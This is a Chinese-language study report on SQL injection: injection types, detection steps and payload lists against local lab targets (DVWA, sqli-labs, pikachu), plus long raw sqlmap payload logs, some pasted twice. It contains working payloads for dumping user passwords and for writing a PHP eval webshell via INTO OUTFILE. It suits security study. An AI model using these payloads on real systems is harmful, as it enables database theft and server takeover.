sql注入学习总结
# sql注入学习总结
本关任务
1、收集网络上各种 sql 注入时使用的 payload 并理解其适用的环境(检测注入、利用注入)
2、记录 sqlmap 的检测和利用过程中使用的 payload(也算一种 payload 收集方式)
3、理解以上涉及的 sql 语句的意思,其中会涉及不同的数据库、不同注入场景,可以将学习的过程和收集的方式进行整理形成报告,关于 payload 的理解,其中会涉及之前学习的基础。
学习思路
sql注入分类
漏洞原理
服务端在与数据库进行交互时,使用了字符串拼接的方式构造SQL语句,并且服务端没有对用户提交的参数进行严格的过滤,导致用户可以将SQL语句插入到可控参数中,改变原有的SQL语义结构,从而打到执行攻击者所预期的结果。
漏洞危害
1、攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
2、通过操作数据库对某些网页进行篡改;
3、修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;攻击者进而可以对网页进行篡改,发布一些违法信息等。
4、服务器被远程控制,被安装后门。可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。
5、数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改。
6、破坏硬盘数据,导致全系统瘫痪;
漏洞分类
注入类型
数字型
当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入
举例:
(1) 加单引号,URL:www.text.com/text.php?id=3’
对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;
(2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1
对应的sql:select * from table where id=3’ and 1=1 语句执行正常,与原始页面如任何差异;
(3) 加and 1=2,URL:www.text.com/text.php?id=3 and 1=2
对应的sql:select * from table where id=3 and 1=2 语句可以正常执行,但是无法查询出结果,所以返回数据与原始网页存在差异
如果满足以上三点,则可以判断该URL存在数字型注入
字符型
当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。
例如数字型语句:
select * from table where id =3
则字符型如下:
select * from table where name=’admin’
因此,在构造payload时通过闭合单引号可以成功执行语句:
测试步骤:
(1) 加单引号:
select * from table where name=’admin’’
由于加单引号后变成三个单引号,则无法执行,程序会报错;
(2) 加 ’and 1=1 此时sql 语句为:
select * from table where name=’admin’ and 1=1’
也无法进行注入,还需要通过注释符号将其绕过;
Mysql 有三种常用注释符:
-- 注意,这种注释符后边有一个空格
通过#进行注释
/* */ 注释掉符号内的内容
因此,构造语句为:
select * from table where name =’admin’ and 1=1—
可成功执行返回结果正确;
(3) 加and 1=2— 此时sql语句为:
select * from table where name=’admin’ and 1=2 –
则会报错
如果满足以上三点,可以判断该url为字符型注入。
搜索型
一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:
其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入。
原理:
$sql="select * from user where password like '%$pwd%' order by password";
这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢?
'and 1=1 and '%'='
这样的话这句SQL语句就变成了这样:
select * from user where password like '%fendo'and 1=1 and '%'='%' order by password
判断搜索型注入的方法:
搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;
搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;
搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况
搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况
根据两次的返回情况来判断是不是搜索型文本框注入了
常用语句:
'and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='
提交方式
Get
GET 请求的参数是放在 URL 里的, GET 请求的 URL 传参有长度限制 中文需要
get是包含数字,字符和搜索的
举例:
post
POST 请求参数是放在请求 body 里的,长度没有限制
cookie
cookie 参数放在请求头信息,提交的时候 服务器会从请求头获取
http头部
放在http头部的,比如UA,HOST,referer
比如登录
成功登录后
可以看到记录了HTTP头部信息
这样就可以测试是否存在注入
获取信息的方式
基于布尔的盲注
基于布尔的盲注主要表现为:
- 没有报错信息
- 不管是输入的正确还是错误的,都只显示两种情况(对或错)
- 在正确的输入下,输入and 1=1/and 1=2发现可以测试
输入vince' and 1=2 #'发现系统存在sql注入
vince' and substr(database(),1,1)='p' #
判断数据库的第一个字母的是否为p,是则返回username存在,不是返回不存在。进而一步步进行判断出每一个字母。
基于时间的盲注
基于时间的盲注和布尔盲注类似,在面对无法通过布尔盲注测试时,可以通过在and后设置响应的时间来判断,实现时间盲注。
睡眠5秒
vince' and sleep(5) #
如果第一个字符是p就会加载五秒,如果不是就会立刻返回。
vince' and if((substr(database(),1,1))='p',sleep(5),null) #
基于报错的注入
基于报错的信息获取:在mysql中使用一些指定的函数来制造报错,从报错信息中获取设定的信息,select/insert/update/delete都可以使用报错来获取信息,后台没有屏蔽数据库报错信息,在语法发生错误是会输出前端。
三个常用的用来报错的函数
updatexml():函数是mysql对xml文档数据进行查询和修改的XPATH函数
extractvalue():函数是mysql对xml文档数据进行查询的XPATH函数
floor():mysql中用来取整的函数
updatexml函数
构造payload
aaa' or updatexml(1,concat(0x7e,database()),0) or '
后台逻辑
insert into member(username,pw,sex,phonenum,email,address) values('aaa' or updatexml(1,concat(0x7e,database()),0) or '',md5('s'),'s','s','s','s');
extractvalue函数
extractvalue (XML_document, XPath_string);
extractvalue():从目标XML中返回包含所查询值的字符串。
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
concat:返回结果为连接参数产生的字符串。
ss' or extractvalue(1,concat(0x7e,database())) or '
后台逻辑
update member set sex='test1',phonenum='ss' or extractvalue(1,concat(0x7e,database())) or '',address='s',email='s' where username='s';
floor函数
select * from security.users where id=1 and(select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
Count(*) 统计重复行数
Rand() 伪随机数
Group by 分组,去重
Floor() 向下取整
构造payload
and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
联合查询注入
连合查询的步骤:
找注入点且得到闭合字符
判断数据库类型
猜解列数,得到显示位
得到基本信息(如:数据库名、数据库版本、当前数据库名等)
1' order by 2 判断几列
s' union select 1,2 #' 查看回显位置
union select 1,group_concat(schema_name) from information_schema.schemata--+ 查库
union select 1,group_concat(table_name) from information_schema.tables where table_schema ='dvwa' 查表
union select 1,group_concat(column_name) from information_schema.columns where table_name='users' 查字段
union select 1,group_concat(user_id,user,password) from users 脱裤
union select 1,'<?php eval($_post[shell]); ?>' into outfile 'C:/xampp/htdocs/dvwa/testtest.php' 写shell
堆查询注入 (可同时执行多条语句)
在SQL中,分号(;)是用来表示一条sql语句的结束。堆叠查询注入通过分号或其他结束符号结束一个sql语句后继续构造下一条语句,堆叠注入可以执行的是任意的语句。
使用条件
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行。
但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行。
宽字节注入
宽字节注入是利用的MySQL的一个特性,MySQL的在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)。所以%DF和后面的\也就是%5c中变成了一个汉字“运”,而“逃逸了出来。
宽字节注入的条件
1.数据库编码设置成GB系列
连接数据库使用GB系列的编码。
2.使用了转义函数,将GET、POST、cookie传递的参数进行过滤,将单引号、双引号、null等敏感字符用转义符 \ 进行转义。
常见的函数包括addslashes()、mysql_real_escape_string()。转义函数的转义作用,就是我们常说的“过滤机制”。
当两个条件都满足时,才会存在宽字节注入。
构造payload
s%DF' or 1=1 #
举例:
输入1:
输入1'可以看到转义了
上文宽字节构造方法,构造id=1%df’或者id=1%aa’,成功报错
后面就是正常的报错注入
sql注入payload
手工注入
报错注入
字符型和数字型皆可以
union select 1,group_concat(schema_name) from information_schema.schemata--+
union select 1,group_concat(table_name) from information_schema.tables where table_schema ='dvwa'
union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
union select 1,group_concat(user_id,user,password) from users
union select 1,'<?php eval($_post[shell]); ?>' into outfile 'C:/xampp/htdocs/dvwa/testtest.php'
布尔盲注
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))=115 --+ 数据库数量
http://127.0.0.1/sqlilab/Less-5/?id=1' and length(database())='9'--+ 数据库长度
http://127.0.0.1/sqlilab/Less-5/?id=1' and left((select database()),1)='a'--+ 当前数据库
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101--+ 第一个表
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))=101--+ 第二个表
字段
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select username from security.users limit 0,1),1,1))=68–+
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select password from security.users limit 0,1),1,1))=68–+
延时注入
判断注入点:
' and if(1=0,1, sleep(10)) --+
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
猜数据库长度:
if(*,*,*)
length(database())
true:sleep(10) false:sleep(1)
if(length(database())=8,sleep(5),1)--+
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(length(database())=8,sleep(10),sleep(1))--+
猜数据库名字:
if(*,*,*)
length(database())
true:sleep(10) false:sleep(1)
if(length(database())=8,sleep(5),1)--+
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(length(database())=8,sleep(10),sleep(1))--+
查出所有表:
if(*,*,*)
ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101–+
true:sleep(10) false:sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101,sleep(10),sleep(1))--+
查字段名字
if(*,*,*)
ascii(substr((select username from security.users limit 0,1),1,1))=68–+
true:sleep(10) false:sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68–+,sleep(10),sleep(1))--+
猜字段数据
if(*,*,*)
ascii(substr((select username from security.users limit 0,1),1,1))=68–+
true:sleep(10) false:sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(10),sleep(1))--+
自动化工具payload
sqlmap
mysql union联合
使用语句:
python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vicne*&submit=%E6%9F%A5%E8%AF%A2" --dbms=mysql --technique U -v 3 --batch
[10:37:04] [PAYLOAD] vicne) ORDER BY 1-- -
[10:37:05] [PAYLOAD] vicne) ORDER BY 4031-- -
[10:37:05] [PAYLOAD] vicne ORDER BY 1-- -
[10:37:05] [PAYLOAD] vicne ORDER BY 2608-- -
[10:37:05] [PAYLOAD] vicne') ORDER BY 1-- -
[10:37:06] [WARNING] reflective value(s) found and filtering out
[10:37:06] [PAYLOAD] vicne' ORDER BY 1-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 9194-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 10-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 6-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 4-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 3-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 2-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL UNION ALL SELECT CONCAT(0x716a766b71,0x786b4a646565686c436b72646842616f7066764e4753554f6d684145454161524d6f584f7078424d,0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL FROM (SELECT 0 AS qUKp UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS AhsU-- -
[10:37:04] [PAYLOAD] vicne) ORDER BY 1-- -
[10:37:05] [PAYLOAD] vicne) ORDER BY 4031-- -
[10:37:05] [PAYLOAD] vicne ORDER BY 1-- -
[10:37:05] [PAYLOAD] vicne ORDER BY 2608-- -
[10:37:05] [PAYLOAD] vicne') ORDER BY 1-- -
[10:37:06] [WARNING] reflective value(s) found and filtering out
[10:37:06] [PAYLOAD] vicne' ORDER BY 1-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 9194-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 10-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 6-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 4-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 3-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 2-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL UNION ALL SELECT CONCAT(0x716a766b71,0x786b4a646565686c436b72646842616f7066764e4753554f6d684145454161524d6f584f7078424d,0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL FROM (SELECT 0 AS qUKp UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS AhsU-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (QUARTER(NULL) IS NULL) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (SESSION_USER() LIKE USER()) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,2952,NULL))) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x717a6a7a71),NULL--
mysql 报错
[10:59:19] [PAYLOAD] 1212.(,",')..(
[10:59:20] [PAYLOAD] 1212'vTuXrl<'">mUNBgf
[10:59:20] [PAYLOAD] 1212) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VfiF
[10:59:21] [PAYLOAD] 1212') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- Cgfu
[10:59:21] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- xwLe
[10:59:21] [PAYLOAD] 1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- QAnl
[10:59:22] [PAYLOAD] 1212) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (8491=8491
[10:59:22] [PAYLOAD] 1212)) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((1509=1509
[10:59:23] [PAYLOAD] 1212))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (((2571=2571
[10:59:23] [PAYLOAD] 1212 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))
[10:59:23] [PAYLOAD] 1212') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('GXgi'='GXgi
[10:59:23] [PAYLOAD] 1212')) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('CTtX'='CTtX
[10:59:23] [PAYLOAD] 1212'))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('eHPK'='eHPK
[10:59:23] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xRub'='xRub
[10:59:23] [PAYLOAD] 1212') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('zHdf' LIKE 'zHdf
[10:59:23] [PAYLOAD] 1212')) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('qONo' LIKE 'qONo
[10:59:23] [PAYLOAD] 1212'))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('xuUi' LIKE 'xuUi
[10:59:23] [PAYLOAD] 1212%' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'klWR%'='klWR
[10:59:23] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'TwBK' LIKE 'TwBK
[10:59:23] [PAYLOAD] 1212") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("nePS"="nePS
[10:59:23] [PAYLOAD] 1212")) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("jwWD"="jwWD
[10:59:23] [PAYLOAD] 1212"))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("ERiE"="ERiE
[10:59:23] [PAYLOAD] 1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "Gesm"="Gesm
[10:59:23] [PAYLOAD] 1212") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("dMeC" LIKE "dMeC
[10:59:23] [PAYLOAD] 1212")) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("WWNr" LIKE "WWNr
[10:59:23] [PAYLOAD] 1212"))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("yQdW" LIKE "yQdW
[10:59:23] [PAYLOAD] 1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "DlnV" LIKE "DlnV
[10:59:23] [PAYLOAD] 1212 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- fhgR
[10:59:23] [PAYLOAD] 1212 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))# yfhc
[10:59:23] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) OR 'mysM'='CoPG
[10:59:23] [PAYLOAD] 1212') WHERE 7892=7892 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- gaJK
[10:59:23] [PAYLOAD] 1212") WHERE 6164=6164 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- xNoX
[10:59:23] [PAYLOAD] 1212) WHERE 5780=5780 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- DEQp
[10:59:23] [PAYLOAD] 1212' WHERE 1154=1154 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- rnmW
[10:59:23] [PAYLOAD] 1212" WHERE 8456=8456 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- nMTS
[10:59:23] [PAYLOAD] 1212 WHERE 5014=5014 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- vieb
[10:59:23] [PAYLOAD] 1212'||(SELECT 0x5a47454f WHERE 6319=6319 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:23] [PAYLOAD] 1212'||(SELECT 0x41417650 FROM DUAL WHERE 6061=6061 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:23] [PAYLOAD] 1212'+(SELECT 0x4d634366 WHERE 3060=3060 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+'
[10:59:23] [PAYLOAD] 1212||(SELECT 0x534f6859 FROM DUAL WHERE 2128=2128 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:23] [PAYLOAD] 1212||(SELECT 0x776c666e WHERE 1721=1721 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:23] [PAYLOAD] 1212+(SELECT CzVP WHERE 6611=6611 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:23] [PAYLOAD] 1212+(SELECT 0x53765542 WHERE 7728=7728 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:23] [PAYLOAD] 1212')) AS bEqI WHERE 7730=7730 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VbHU
[10:59:23] [PAYLOAD] 1212")) AS SyBM WHERE 9288=9288 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VEjO
[10:59:23] [PAYLOAD] 1212)) AS JiLy WHERE 2791=2791 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- RqQR
[10:59:23] [PAYLOAD] 1212') AS HCql WHERE 3421=3421 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- OKcU
[10:59:23] [PAYLOAD] 1212") AS GqbM WHERE 7769=7769 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- XrAZ
[10:59:23] [PAYLOAD] 1212) AS fgmR WHERE 2047=2047 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- YCtM
[10:59:23] [PAYLOAD] 1212` WHERE 3279=3279 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- Xvlq
[10:59:23] [PAYLOAD] 1212`) WHERE 1917=1917 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- bDGq
